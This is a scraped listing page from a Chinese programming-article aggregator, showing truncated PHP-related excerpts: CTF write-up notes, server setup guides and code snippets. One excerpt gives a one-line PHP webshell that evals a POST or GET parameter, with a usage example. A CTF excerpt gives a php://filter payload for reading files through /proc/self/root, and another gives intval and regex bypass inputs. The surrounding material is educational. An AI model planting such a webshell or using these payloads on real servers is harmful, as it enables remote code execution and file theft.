ICode9

精准搜索请尝试: 精确搜索
  • buu刷题笔记之文件上传2021-10-19 15:03:27

    [极客大挑战 2019]Upload 判断文件头内容是否符合要求,这里举几个常见的文件头对应关系: (1) .JPEG;.JPE;.JPG,”JPGGraphic File” (2) .gif,”GIF 89A” (3) .zip,”Zip Compressed” (4) .doc;.xls;.xlt;.ppt;.apr,”MS Compound Document v1 or Lotus Approach APRfile” 打开环境,看到是一个

  • php根据详细地址获取经纬度(腾讯地图)2021-10-19 14:30:13

    // 根据详细地址获取经纬度 public function index(){ $data_info=$this->curl("https://apis.map.qq.com/ws/geocoder/v1/?address=详细地址&key=你的密钥"); $data_info = json_decode($data_info, true); //数据转换 print_r($data_info);

  • 73:应急响应-WEB分析php&javaweb&自动化工具2021-10-19 10:34:51

    应急响应: 保护阶段,分析阶段,复现阶段,修复阶段,建议阶段 目的:分析出攻击时间,攻击操作,攻击后果,安全修复等并给出合理解决方案。 必备知识点: 1.熟悉常见的 WEB 安全攻击技术 2.熟悉相关日志启用及存储查看等 3.熟悉日志中记录数据分类及分析等 准备工作: 1.收集目标服务器各类信息

  • nginx 子目录执行php2021-10-18 21:34:52

    location ^~ /sub/ { set $subroot /home/www/sv8/wwwroot/; root $subroot; index index.php index.html; location ~ \.php { fastcgi_pass php5:9000; set $scriptname ''; set $pathinfo &

  • 仿淘宝项目遇到的问题整理2021-10-18 21:03:48

    仿淘宝项目遇到的问题整理 问题1:Ajax请求返回一个php文件现象:Ajax请求成功状态码为304,返回值为一整个php文件,直接通过localhost访问php文件得到值为1(正常值)原因:使用了vscode自带的服务器5500端口打开文件,5500解析不了Apache的php文件解决:用localhost或者127.0.0.1访问html

  • 服务器,php,MySQL2021-10-18 20:02:12

    JS从入门到精通全套完整版p=288 什么是服务器 ?   + 一个 提供 服务的 机器   + 什么是服务 ?     => 根据需求给出对应的内容     => 接口: 根据不同的需求, 给出不同的数据     => 文件: 根据不同的请求, 给出不同的文件数据(html, css, js, 视音频, ...)   + 就是一

  • ctf_show-php特性-89-1322021-10-18 19:00:07

    89   get传参,满足两个条件,不能出现0-9,但是要满足是整数 这里传入 ?num[]=a 即可,对于第一个过滤,preg_match()函数无法处理数组。对于第二个过滤,intval()** 不能用于 object,否则会产生 **`E_NOTICE`** 错误并返回 1。     90   ?num=+4476 ,由于是强等于,绕过方法很多,加正号,八进

  • 单机版Discuz网站LAMP架构部署2021-10-18 17:04:45

    查看LAMP环境,需要的软件包 # rpm -qa |grep mysql # rpm -qa |grep php # rpm -qa |grep httpd 1、安装apache: # yum install -y httpd # vim /etc/httpd/conf/httpd.conf 96 #下面这行的意思是允许所有计算机通过ip地址访问本地80端 97 ServerName localhost:80

  • 如何复制word的图文到CKEditor中自动上传2021-10-18 16:31:25

    ​ 如何做到 ueditor批量上传word图片? 1、前端引用代码 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>

  • php5.6.3 源码安装2021-10-18 14:32:19

    php5.6.3 源码安装1 安装依赖库 yum install -y autoconf libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libpng libpng-devel libxml2 libxml2-devel glibc glibc-devel glib2 glib2-devel bzip2 bzip2-devel curl curl-devel gdbm-devel db4-devel libXpm

  • mac安装php2021-10-18 11:33:56

        brew reinstall php   安装完成配置: ==> Downloading https://mirrors.ustc.edu.cn/homebrew-bottles/bottles/php-8.0.11_Already downloaded: /Users/huangdan07/Library/Caches/Homebrew/downloads/5f7fe12c310bba3fb550de97deff649d509fd63803b180f48fa768ca94e41

  • 使用Docker Compose 搭建lnmp2021-10-17 19:31:07

    对docker容器集群的快速编排 Docker-compose 一: Docker-compose 简介 1.1 为什么使用 Docker-compose 我们知道使用一个Dockerfile模板文件可以定义一个单独的应用容器,如果需要定义多个容器就需要服务编排。服务编排有很多种技术方案,今天给大家介绍Docker官方产品Docker Compos

  • 合天网_web模块实验笔记32021-10-17 19:03:28

    文件上传漏洞实战总结文件包含漏洞涉及到的php过滤函数:trim()str_ireplace() 去除首尾字符串 strtolower() 转换小写deldot() 删除文件名末尾的点strrchr() 查找指定字符在字符串中的最后一次出现 使用的靶场upload 实验一:实验关键点fread($file,2) 只读2字节,通过文件的前两个字节

  • PHP类范围2021-10-17 17:01:47

    转自:PHP类范围我是PHP的新手 在整个PHP应用程序中控制对类的访问的最佳方法是什么?在整个应用程序中需要访问这些类的最佳位置在哪里?例;我有一个在登录过程中创建的用户类,但每次页面发布时都会显示该对象已重新初始化https://www.pinlue.com/article/2019/06/1111/089145698407.

  • php获取后面?id参数进行判断参数跳转目标站2021-10-17 15:33:54

       今天有位老铁需要php获取后面参数进行判断参数跳转目标站,例如:比如1.php?id=1  跳转baidu.com   id=2 跳转到qq.com,怎么做到,查看以下代码:    <?php //通过get函数获取id $id=$_GET['id']; if($id=="1"){ $url="http://www.baidu.com"; header('HTTP/1.1 301 Move

  • buu刷题笔记之反序列化2021-10-17 14:32:37

    [极客大挑战 2019]PHP 解题思路:打开题目,提示有备份=源码。于是上手7kb加CTF源码泄露字典。 发现www.zip压缩包,下载解压后发现源码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; pu

  • [WMCTF2020]Make PHP Great Again2021-10-17 13:00:20

    [WMCTF2020]Make PHP Great Again 0x01前言 php小技巧 0x02php小技巧 /proc/self指向当前进程的/proc/pid/,/proc/self/root/是指向/的符号链接,想到这里,用伪协议配合多级符号链接的办法进行绕过。 payload=php://filter/read=convert.base64-encode/resource=/proc/self/root/p

  • php使用ceph2021-10-17 12:33:29

    本文我们接着上文继续来探讨一下如何使用使用 PHP 来操作 Ceph S3 接口。 安装 AWS PHP SDK 建立连接 获取 Bucket 列表 创建一个 Bucket 删除一个 Bucket 获取文件列表 上传文件 删除文件 下载文件 生成文件下载地址 参考文档 安装 AWS PHP SDK 很简单,直接使用 composer 安装

  • 单台服务器部署LNMP架构测试2021-10-17 11:02:26

    LNMP架构 单台节点部署 环境准备: nginx mysql php 1.nginx环境准备 1.配置nginx源 [root@handsome ~]# cat /etc/yum.repos.d/nginx.repo [nginx-stable] name=nginx stable repo baseurl=http://nginx.org/packages/centos/$releasever/$basearch/ gpgcheck=1 enabled=1 gpgke

  • nginx 配置php2021-10-17 11:01:40

    server { listen 80; server_name www.aa.cn bbb.cn; #charset koi8-r; #access_log /var/log/nginx/host.access.log main; root /www/wwwroot/dssj.haimait.com/public; location / { index index.html index.htm index.php;

  • php小马2021-10-17 09:33:45

     <?php eval(@$_POST['a']); ?>   如果把木马中的post替换成get,那么我么就需要以GET方法发送“a”, <?php @eval($_GET['a']);?> (就像这样: http://127.0.0.1/upload/a0.php?a=phpinfo();)     https://www.jianshu.com/p/90473b8e6667

  • php中reset函数的作用,reset函数怎么用2021-10-17 09:03:00

    PHP reset()函数将数组的内部指针指向第一个单元。 php reset()函数 语法 作用:将内部指针指向数组中的第一个元素,并输出。 语法:reset(array) 参数: array 必需。规定要使用的数组。 说明:若成功则返回数组中第一个元素的值,若数组为空则返回 FALSE。 php reset()函数 示例1<?p

  • [SWPUCTF 2018]SimplePHP2021-10-16 23:35:17

    [SWPUCTF 2018]SimplePHP 打开环境 查看文件处可以查看源码 file.php 里面包含function.php和class.php,继续查看源码 function.php class.php base.php 上传页的源码 upload_file.php 文件上传处调用了upload_file()函数,这个函数的声明在function.php中,执行过程是先通过uplo

  • [ZJCTF 2019]NiZhuanSiWei 12021-10-16 22:04:11

    1.发现  1.1打开题目地址,查看为PHP代码审计 代码审计走起,一步一步分析 2.步骤 2.1大体要传入三个参数,先看第一段语句,   知识点 1)PHP函数 1.isset:PHP: isset - Manual 2.file_get_contents:PHP: file_get_contents - Manual  2)关于伪协议常用的payload,包括读文件和php代码执行 1

  • php+websocket 实现聊天室2021-10-16 21:03:37

    一、配置  开启socket组建,否则会报 Fatal error: Call to undefined function socket_create() 错误 1、打开php.ini配置文件,搜索 extension=php_sockets.dll,把前面的‘;’分号删掉。修改之后重启服务。 注意:如果php版本多,一定要注意使用的哪个版本就要取修改哪个版本的php.ini

专注分享技术,共同学习,共同进步。侵权联系[admin#icode9.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有